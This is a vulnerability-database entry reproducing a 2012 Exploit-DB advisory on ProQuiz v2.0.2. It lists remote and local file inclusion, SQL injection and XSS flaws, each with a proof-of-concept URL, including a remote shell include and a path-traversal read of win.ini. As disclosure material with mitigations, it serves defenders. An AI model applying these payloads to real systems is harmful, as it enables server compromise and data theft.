ProQuiz v2.0.2 - Multiple Vulnerabilities

vendor:

ProQuiz

by:

L0n3ly-H34rT

7,5

CVSS

HIGH

Remote File Include, Local File Include, Remote SQL Injection & Blind SQL Injection

94, 98, 89, 79

CWE

Product Name: ProQuiz

Affected Version From: 2.0.2

Affected Version To: 2.0.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows

2012

ProQuiz v2.0.2 – Multiple Vulnerabilities

ProQuiz v2.0.2 is vulnerable to Remote File Include, Local File Include, Remote SQL Injection & Blind SQL Injection. In File (my_account.php) in line 114 & 115, if($_GET['action']=='getpage' && !empty($_GET['page'])){@include_once($_GET['page'].'.php'); is vulnerable to Remote File Include & Local File Include. For Remote File Include, an attacker can register and login in the panel and paste the malicious URL. For Local File Include, an attacker can register and login in the panel and paste the malicious URL. For Remote SQL Injection & Blind SQL Injection, in two files, answers.php in line 55 and functions.php in $_POST['email'] and $_POST['username'], an attacker can inject malicious SQL code in the URL and POST method.

Mitigation:

To mitigate Remote File Include & Local File Include, the application should use a whitelist of allowed files and should not rely on the client to provide the file name. To mitigate Remote SQL Injection & Blind SQL Injection, the application should use parameterized queries and should not rely on the client to provide the query.

Source

Exploit-DB raw data:

####################################################
### Exploit Title: ProQuiz v2.0.2 - Multiple Vulnerabilities 
### Date: 18/7/2012 
### Author: L0n3ly-H34rT 
### My Site: http://se3c.blogspot.com/
### Contact: l0n3ly_h34rt@hotmail.com 
### Vendor Homepage: http://proquiz.softon.org/ 
### Software Link: http://code.google.com/p/proquiz/downloads/list
### Tested on: Linux/Windows 
####################################################

1- Remote File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php'); 

* P.O.C :

First register and login in your panel and paste that's url e.g. :

http://127.0.0.1/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?

* Note :

Must be allow_url_include=On

-----------------------------------------------------------------------

2- Local File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php'); 

* P.O.C :

First register and login in your panel and paste that's url e.g. :

http://127.0.0.1/full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg

* Note :

Must be magic_quotes_gpc = Off

---------------------------------------------------------------------

3- Remote SQL Injection & Blind SQL Injection :

* In Two Files :

A- First ( answers.php ) in line 55 :

<?php echo $_GET['instid']; ?>

B- Second ( functions.php ) In :

$_POST['email']

$_POST['username']

* P.O.C :

A- First :

http://127.0.0.1/full/answers.php?action=answers&instid=[SQL]

B- Second :

About Email :

In URL:

http://127.0.0.1/full/functions.php?action=recoverpass

Inject Here In POST Method :

email=[SQL]

About Username :

In URL:

http://127.0.0.1/full/functions.php?action=edit_profile&type=username

Inject Here In POST Method :

username=[SQL]

-------------------------------------------------------------------------------------

4 - Cross Site Scripting :

e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]

-----------------------------------------------------------------------------------

# Greetz to my friendz

References:

http://se3c.blogspot.com/
http://code.google.com/p/proquiz/downloads/list